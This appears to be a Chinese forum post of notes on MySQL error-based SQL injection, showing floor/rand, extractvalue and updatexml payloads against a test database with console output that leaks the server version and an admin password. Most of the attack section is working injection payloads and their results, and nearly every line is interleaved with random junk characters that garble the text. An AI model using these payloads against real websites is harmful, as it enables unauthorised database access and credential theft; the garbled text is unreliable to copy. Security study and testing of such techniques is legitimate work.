放点原来的笔记,Mysql在执行语句的时候会抛出异常信息信息,而php+mysql架构的网站往往又将错误代码显示在页面上,这样可以通过构造如下三种方法获取特定数据。
2 [: Z# |5 N: n& q r, ^实际测试环境:! R! b% U! c+ z% `( t% W" T6 P" ^3 @
) F$ k4 y( y' w. n: d8 [
2 I4 d5 ^5 O/ o5 Q9 m1 Z7 |& k
mysql> show tables;
2 y/ E3 ?% @; F" A% a# J+----------------+
( Q/ S4 r5 w$ b$ W* i( W1 l% H| Tables_in_test |
! B @- p, `+ b6 c7 ?1 b% L+----------------+ u3 Z e3 j* v0 O/ q8 B
| admin |
( U* g/ }1 ?/ e8 J' Q- u| article |
; `* J/ U$ Q6 Q/ V+----------------+
0 ?1 @( { Q+ U, a1 x' e2 |
9 B6 X5 K8 j4 _; r# }8 y; f3 I + l# `6 {, y. c) q7 z# V
) i" z, ]: o0 i. [. z+ X
mysql> describe admin;2 y9 T" W G0 r9 }- T0 }" J' B
+-------+------------------+------+-----+---------+----------------+
* F# h# X) S) f| Field | Type | Null | Key | Default | Extra |
6 G: ^+ H% u8 c9 q! ~, a7 H+-------+------------------+------+-----+---------+----------------+
. _: s( I% o6 W; G5 K) C4 ]| id | int(10) unsigned | NO | PRI | NULL | auto_increment |: |7 W0 J$ M" c2 v. x/ ]% O2 M3 M; w
| user | varchar(50) | NO | | NULL | |
( M/ b }$ m c. r3 s| pass | varchar(50) | NO | | NULL | |) A: [( Z3 f' J t
+-------+------------------+------+-----+---------+----------------+
! o& W8 F: |7 h' d - s7 z0 i8 o# P6 D/ o/ a* t n$ |4 {
% d8 Q% f+ Q+ I$ M4 Z
V3 m5 Y' H3 c! J+ j* U+ j
mysql> describe article;
+ b, f* t8 x$ I- o. w1 g8 w* A+---------+------------------+------+-----+---------+----------------+4 ^ W2 f0 m' b! o+ Y. c( O
| Field | Type | Null | Key | Default | Extra |# ?. T; o% j- i5 [2 n5 p' [
+---------+------------------+------+-----+---------+----------------+7 F/ P8 y) t+ ]: T; O% n0 H
| id | int(10) unsigned | NO | PRI | NULL | auto_increment |
0 ^# [$ z# g, p. T8 d& B6 l| title | varchar(50) | NO | | NULL | |
1 w- V8 ?2 B2 w( F# l6 L| content | varchar(50) | NO | | NULL | |
; P" R% ]4 m G9 J* ^+---------+------------------+------+-----+---------+----------------+
8 o4 Y* ?6 R& m- }1、通过floor报错8 r$ L, }5 c6 _' r2 f1 Q7 R j. ?
可以通过如下一些利用代码
1 b5 I, s3 C* ^: T$ Q9 b2 C+ ~& u
& Q( @4 X& _& |4 ~( a, ?" `8 c : G1 x2 R/ }4 @& Q& P. s3 @
and select 1 from (select count(*),concat(version(),floor(rand(0)*2))x( [ A- n/ J- c# W6 Q
from information_schema.tables group by x)a);, v, w" O2 l3 L s, Q% I, M/ c
: g5 b3 [* s5 P+ F2 l - q7 D! b) i; X* A! A3 c0 d& _* ~$ Y: O
and (select count(*) from (select 1 union select null union select !1)x
; V( t9 F3 m7 Z6 L+ Agroup by concat((select table_name from information_schema.tables limit 1),
o# P, ^" S x; V) zfloor(rand(0)*2)));4 |8 W$ A6 D- i6 d* w6 K t8 g
举例如下:3 Q9 I* E2 ~2 X3 Q
首先进行正常查询:
/ E t# n5 ~9 J/ B: K- y ^/ q
# k$ z9 Q: I, `8 y b; wmysql> select * from article where id = 1;$ q% | F- W0 h5 c' t& _0 G: \( ^7 w
+----+-------+---------+. P4 n1 Q( D. H+ K& a
| id | title | content |
$ z2 q% l. j0 |& o2 D+----+-------+---------+
$ p5 k J. l7 |+ n$ o/ w5 H ]0 U| 1 | test | do it |1 E& s# G9 w. a) ?* x, s# O
+----+-------+---------+6 h: ^7 x1 o/ o2 B" E0 @* E
假如id输入存在注入的话,可以通过如下语句进行报错。( {4 |! R+ b9 Q/ M! O( m
& k% H* H) E& ] / @7 N( J( F7 K+ e3 i$ A
mysql> select * from article where id = 1 and (select 1 from$ E, Z& f- G% @0 f' d
(select count(*),concat(version(),floor(rand(0)*2))x from information_schema.tables group by x)a);4 T7 H3 A( y' T9 n: u, @% V
ERROR 1062 (23000): Duplicate entry '5.1.33-community-log1' for key 'group_key' j% x# {* D% m- ?' U
可以看到成功爆出了Mysql的版本,如果需要查询其他数据,可以通过修改version()所在位置语句进行查询。/ Y. Y$ M( S4 z$ B: t/ k0 B8 i
例如我们需要查询管理员用户名和密码:
0 x& O/ f' T3 R3 l0 S3 k9 a* U. qMethod1:
% B& U: l2 m- x7 M k
3 }* \7 }4 X' s : J1 ^" B! }1 J. B- R% M
mysql> select * from article where id = 1 and (select 1 from2 _/ l7 r- G% v- Z
(select count(*),concat((select pass from admin where id =1),floor(rand(0)*2))x: _6 u8 ^% f* l& K! l
from information_schema.tables group by x)a);/ f9 b1 g6 c7 h* B; M1 y; Q) Y, p( `
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'
. x3 @# F4 V( X5 PMethod2:! y* J; X$ j' ~4 u
( \2 [& i6 } \% L/ {( K4 {
3 k( y/ a: u9 y% L3 \# Xmysql> select * from article where id = 1 and (select count(*), W! E2 \( k3 }! T. T3 H4 X8 S
from (select 1 union select null union select !1)x group by concat((select pass from admin limit 1),9 I" q+ I- z( K
floor(rand(0)*2)));( a$ F; ~& b* D# e: t
ERROR 1062 (23000): Duplicate entry 'admin8881' for key 'group_key'4 q' [" ?8 Y! i5 ~; G
2、ExtractValue; u ^& u# t8 }: I1 |& t7 I
测试语句如下4 k. R! S$ E# Y# ~3 d
6 O/ w+ m" Z( J; \) {, h
+ ^- F3 T# e9 B% C8 \; qand extractvalue(1, concat(0x5c, (select table_name from information_schema.tables limit 1)));5 W# _- L8 A1 k# W9 Q0 d
实际测试过程
8 o1 n) d+ S8 k! h, z8 \% e$ L$ {, J
# z# h A( p* I9 ]% N3 ` ; v$ ~3 A7 U# j P# M- H) z7 F1 f
mysql> select * from article where id = 1 and extractvalue(1, concat(0x5c,
5 _- z3 i1 V9 i3 Z* ]9 \& @% N(select pass from admin limit 1)));--
$ x7 s/ v5 {5 W. ?ERROR 1105 (HY000): XPATH syntax error: '\admin888'; N& \- ? d" [4 _+ {5 x
3、UpdateXml
9 M4 F1 d0 v5 V1 ^$ x测试语句0 T0 j5 j2 |5 Z- {& j% d! Z# [1 V* r
3 I& z0 l6 ^8 A7 `* E
2 O6 A: l \! B, J
and 1=(updatexml(1,concat(0x5e24,(select user()),0x5e24),1))7 p z4 K& L2 ^+ `
实际测试过程
/ J: c* \: n) l# y* g& r" R
: R% v1 H" |( [1 T
' P* }$ g m% Umysql> select * from article where id = 1 and 1=(updatexml(1,concat(0x5e24,3 o4 V0 K6 d* z4 _+ H7 F& U3 P
(select pass from admin limit 1),0x5e24),1));5 S/ i" X* C3 p7 S
ERROR 1105 (HY000): XPATH syntax error: '^$admin888^$'& h7 E: k0 Z- \0 {3 g" r1 {9 V9 ~
All, thanks foreign guys.( K8 [' T% d- j; j3 U# S
6 f v9 Q4 I' i/ i! h5 Y
5 ^4 N& t6 B* K. S7 H3 k; D |
发表于 2012-12-10 10:28:51
收藏
支持
反对